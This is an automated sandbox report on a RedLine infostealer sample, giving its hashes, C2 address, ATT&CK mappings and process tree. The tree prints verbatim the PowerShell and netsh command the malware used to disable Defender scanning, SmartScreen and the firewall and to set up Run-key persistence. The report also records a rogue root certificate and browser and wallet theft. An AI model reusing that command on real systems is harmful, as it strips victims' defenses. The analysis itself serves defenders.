redline | 770e6bbe4c4f4e7abfbb4a533d28f8e44c5a374aa05dc3c333d7f15594e217e7

Analysis

max time kernel
145s
max time network
148s
platform
windows7_x64
resource
win7-en-20210920
submitted
26-09-2021 22:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

96c2ef023febbd4e3773bbb3a59e54c3.exe
Size

417KB
MD5

96c2ef023febbd4e3773bbb3a59e54c3
SHA1

8e20dc3097d3380f1b2c567a05b3a7d8dae713bf
SHA256

770e6bbe4c4f4e7abfbb4a533d28f8e44c5a374aa05dc3c333d7f15594e217e7
SHA512

f5e45c4c6f09c1d1d40832b1611fbff8ba822964cdb40e397254ae143a44f8c822ca7b5dcbdd7a3ddbd5f1b383fd7c1db2233ac9301fbc58f3c75f280abb9370

Score

10^/10

redline 7w06zphy discovery evasion infostealer persistence spyware stealer suricata

Malware Config

Extracted

Family

redline

Botnet

7W06ZPHY

188.34.176.164:80

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4"	powershell.exe

RedLine Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1680-66-0x000000000041C5D6-mapping.dmp	family_redline
behavioral1/memory/1680-65-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/1680-68-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

rcn.exeUpSys.exeUpSys.exeUpSys.exe

pid process

1636 rcn.exe
1728 UpSys.exe
1628 UpSys.exe
1220 UpSys.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Drops startup file 1 IoCs

Processes:

rcn.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk rcn.exe

pid	process
1636	rcn.exe
1728	UpSys.exe
1628	UpSys.exe
1220	UpSys.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	rcn.exe

Loads dropped DLL 11 IoCs

Processes:

96c2ef023febbd4e3773bbb3a59e54c3.exercn.exeWerFault.exepowershell.exe

pid	process
1680	96c2ef023febbd4e3773bbb3a59e54c3.exe
1656
1636	rcn.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1840	powershell.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

96c2ef023febbd4e3773bbb3a59e54c3.exe

description pid process target process

PID 1116 set thread context of 1680 1116 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe
Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20210926223821.cab makecab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1316 1636 WerFault.exe rcn.exe

description	pid	process	target process
PID 1116 set thread context of 1680	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	96c2ef023febbd4e3773bbb3a59e54c3.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20210926223821.cab	makecab.exe

pid	pid_target	process	target process
1316	1636	WerFault.exe	rcn.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

powershell.exeUpSys.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4073b83527b3d701	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	UpSys.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

rcn.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	rcn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	rcn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	rcn.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

powershell.exepowershell.exe96c2ef023febbd4e3773bbb3a59e54c3.exe96c2ef023febbd4e3773bbb3a59e54c3.exercn.exepowershell.exeWerFault.exeUpSys.exeUpSys.exepowershell.exe

pid	process
1612	powershell.exe
1436	powershell.exe
1116	96c2ef023febbd4e3773bbb3a59e54c3.exe
1116	96c2ef023febbd4e3773bbb3a59e54c3.exe
1680	96c2ef023febbd4e3773bbb3a59e54c3.exe
1680	96c2ef023febbd4e3773bbb3a59e54c3.exe
1636	rcn.exe
1636	rcn.exe
1840	powershell.exe
1636	rcn.exe
1636	rcn.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1728	UpSys.exe
1728	UpSys.exe
1628	UpSys.exe
1628	UpSys.exe
1252	powershell.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

powershell.exepowershell.exe96c2ef023febbd4e3773bbb3a59e54c3.exe96c2ef023febbd4e3773bbb3a59e54c3.exepowershell.exeWerFault.exeUpSys.exeUpSys.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeIncreaseQuotaPrivilege	1612	powershell.exe
Token: SeSecurityPrivilege	1612	powershell.exe
Token: SeTakeOwnershipPrivilege	1612	powershell.exe
Token: SeLoadDriverPrivilege	1612	powershell.exe
Token: SeSystemProfilePrivilege	1612	powershell.exe
Token: SeSystemtimePrivilege	1612	powershell.exe
Token: SeProfSingleProcessPrivilege	1612	powershell.exe
Token: SeIncBasePriorityPrivilege	1612	powershell.exe
Token: SeCreatePagefilePrivilege	1612	powershell.exe
Token: SeBackupPrivilege	1612	powershell.exe
Token: SeRestorePrivilege	1612	powershell.exe
Token: SeShutdownPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeSystemEnvironmentPrivilege	1612	powershell.exe
Token: SeRemoteShutdownPrivilege	1612	powershell.exe
Token: SeUndockPrivilege	1612	powershell.exe
Token: SeManageVolumePrivilege	1612	powershell.exe
Token: 33	1612	powershell.exe
Token: 34	1612	powershell.exe
Token: 35	1612	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeIncreaseQuotaPrivilege	1436	powershell.exe
Token: SeSecurityPrivilege	1436	powershell.exe
Token: SeTakeOwnershipPrivilege	1436	powershell.exe
Token: SeLoadDriverPrivilege	1436	powershell.exe
Token: SeSystemProfilePrivilege	1436	powershell.exe
Token: SeSystemtimePrivilege	1436	powershell.exe
Token: SeProfSingleProcessPrivilege	1436	powershell.exe
Token: SeIncBasePriorityPrivilege	1436	powershell.exe
Token: SeCreatePagefilePrivilege	1436	powershell.exe
Token: SeBackupPrivilege	1436	powershell.exe
Token: SeRestorePrivilege	1436	powershell.exe
Token: SeShutdownPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeSystemEnvironmentPrivilege	1436	powershell.exe
Token: SeRemoteShutdownPrivilege	1436	powershell.exe
Token: SeUndockPrivilege	1436	powershell.exe
Token: SeManageVolumePrivilege	1436	powershell.exe
Token: 33	1436	powershell.exe
Token: 34	1436	powershell.exe
Token: 35	1436	powershell.exe
Token: SeDebugPrivilege	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe
Token: SeDebugPrivilege	1680	96c2ef023febbd4e3773bbb3a59e54c3.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	1316	WerFault.exe
Token: SeDebugPrivilege	1728	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	1728	UpSys.exe
Token: SeIncreaseQuotaPrivilege	1728	UpSys.exe
Token: 0	1728	UpSys.exe
Token: SeDebugPrivilege	1628	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	1628	UpSys.exe
Token: SeIncreaseQuotaPrivilege	1628	UpSys.exe
Token: SeDebugPrivilege	1252	powershell.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

96c2ef023febbd4e3773bbb3a59e54c3.exe96c2ef023febbd4e3773bbb3a59e54c3.exercn.exepowershell.exeUpSys.exe

description	pid	process	target process
PID 1116 wrote to memory of 1612	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	powershell.exe
PID 1116 wrote to memory of 1612	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	powershell.exe
PID 1116 wrote to memory of 1612	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	powershell.exe
PID 1116 wrote to memory of 1612	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	powershell.exe
PID 1116 wrote to memory of 1436	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	powershell.exe
PID 1116 wrote to memory of 1436	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	powershell.exe
PID 1116 wrote to memory of 1436	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	powershell.exe
PID 1116 wrote to memory of 1436	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	powershell.exe
PID 1116 wrote to memory of 1680	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	96c2ef023febbd4e3773bbb3a59e54c3.exe
PID 1116 wrote to memory of 1680	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	96c2ef023febbd4e3773bbb3a59e54c3.exe
PID 1116 wrote to memory of 1680	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	96c2ef023febbd4e3773bbb3a59e54c3.exe
PID 1116 wrote to memory of 1680	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	96c2ef023febbd4e3773bbb3a59e54c3.exe
PID 1116 wrote to memory of 1680	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	96c2ef023febbd4e3773bbb3a59e54c3.exe
PID 1116 wrote to memory of 1680	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	96c2ef023febbd4e3773bbb3a59e54c3.exe
PID 1116 wrote to memory of 1680	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	96c2ef023febbd4e3773bbb3a59e54c3.exe
PID 1116 wrote to memory of 1680	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	96c2ef023febbd4e3773bbb3a59e54c3.exe
PID 1116 wrote to memory of 1680	1116	96c2ef023febbd4e3773bbb3a59e54c3.exe	96c2ef023febbd4e3773bbb3a59e54c3.exe
PID 1680 wrote to memory of 1636	1680	96c2ef023febbd4e3773bbb3a59e54c3.exe	rcn.exe
PID 1680 wrote to memory of 1636	1680	96c2ef023febbd4e3773bbb3a59e54c3.exe	rcn.exe
PID 1680 wrote to memory of 1636	1680	96c2ef023febbd4e3773bbb3a59e54c3.exe	rcn.exe
PID 1680 wrote to memory of 1636	1680	96c2ef023febbd4e3773bbb3a59e54c3.exe	rcn.exe
PID 1636 wrote to memory of 1840	1636	rcn.exe	powershell.exe
PID 1636 wrote to memory of 1840	1636	rcn.exe	powershell.exe
PID 1636 wrote to memory of 1840	1636	rcn.exe	powershell.exe
PID 1636 wrote to memory of 1316	1636	rcn.exe	WerFault.exe
PID 1636 wrote to memory of 1316	1636	rcn.exe	WerFault.exe
PID 1636 wrote to memory of 1316	1636	rcn.exe	WerFault.exe
PID 1840 wrote to memory of 1728	1840	powershell.exe	UpSys.exe
PID 1840 wrote to memory of 1728	1840	powershell.exe	UpSys.exe
PID 1840 wrote to memory of 1728	1840	powershell.exe	UpSys.exe
PID 1840 wrote to memory of 1240	1840	powershell.exe	netsh.exe
PID 1840 wrote to memory of 1240	1840	powershell.exe	netsh.exe
PID 1840 wrote to memory of 1240	1840	powershell.exe	netsh.exe
PID 1220 wrote to memory of 1252	1220	UpSys.exe	powershell.exe
PID 1220 wrote to memory of 1252	1220	UpSys.exe	powershell.exe
PID 1220 wrote to memory of 1252	1220	UpSys.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
"C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1116
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1436
- C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
  C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1680
- - C:\Users\Admin\AppData\Local\Temp\rcn.exe
    "C:\Users\Admin\AppData\Local\Temp\rcn.exe"
    3⤵
    - Executes dropped EXE
    - Drops startup file
    - Loads dropped DLL
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      4⤵
      Modifies security service
      Loads dropped DLL
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1840
    - - C:\ProgramData\UpSys.exe
        
        "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1728
      - C:\ProgramData\UpSys.exe
        
        "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1628
        
        C:\ProgramData\UpSys.exe
        
        "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
        7⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        Suspicious use of WriteProcessMemory
        
        PID:1220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        8⤵
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1252
    - - C:\Windows\system32\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        5⤵
        
        PID:1240
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1636 -s 1680
      4⤵
      Loads dropped DLL
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1316

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20210926223821.log C:\Windows\Logs\CBS\CbsPersist_20210926223821.cab
1⤵
- Drops file in Windows directory
PID:956

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\UpSys.exe

MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe

MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe

MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe

MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\rcn.exe

MD5
cfadb3a07eb0470aeeec9fa3dbb3ad67

SHA1
37d6410c23e9ca02bc7ed3c75743b3295dd19712

SHA256
1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

SHA512
713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

Download Submit
C:\Users\Admin\AppData\Local\Temp\rcn.exe

MD5
cfadb3a07eb0470aeeec9fa3dbb3ad67

SHA1
37d6410c23e9ca02bc7ed3c75743b3295dd19712

SHA256
1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

SHA512
713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
5f8ceceefb3451642734c4b32a16460b

SHA1
a868adfbb5c8c61ad730783968e3bc5298360a88

SHA256
1927e2d7fab8062194f1f40e9cd36a3ab638696673b4d6d4fa9dedb565cfb46c

SHA512
2c0ef4811a5509599b6f27295f4fa3915e17db0e500e9829e9befd2dd75342b82ef10214f195246e3617847517baea8b3bc371b35e8e104e47619e730f03cf73

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\ProgramData\MicrosoftNetwork\System.exe

MD5
cfadb3a07eb0470aeeec9fa3dbb3ad67

SHA1
37d6410c23e9ca02bc7ed3c75743b3295dd19712

SHA256
1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

SHA512
713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

Download Submit
\ProgramData\UpSys.exe

MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
\Users\Admin\AppData\Local\Temp\rcn.exe

MD5
cfadb3a07eb0470aeeec9fa3dbb3ad67

SHA1
37d6410c23e9ca02bc7ed3c75743b3295dd19712

SHA256
1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

SHA512
713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

Download Submit
\Users\Admin\AppData\Local\Temp\rcn.exe

MD5
cfadb3a07eb0470aeeec9fa3dbb3ad67

SHA1
37d6410c23e9ca02bc7ed3c75743b3295dd19712

SHA256
1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

SHA512
713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

Download Submit
\Users\Admin\AppData\Local\Temp\rcn.exe

MD5
cfadb3a07eb0470aeeec9fa3dbb3ad67

SHA1
37d6410c23e9ca02bc7ed3c75743b3295dd19712

SHA256
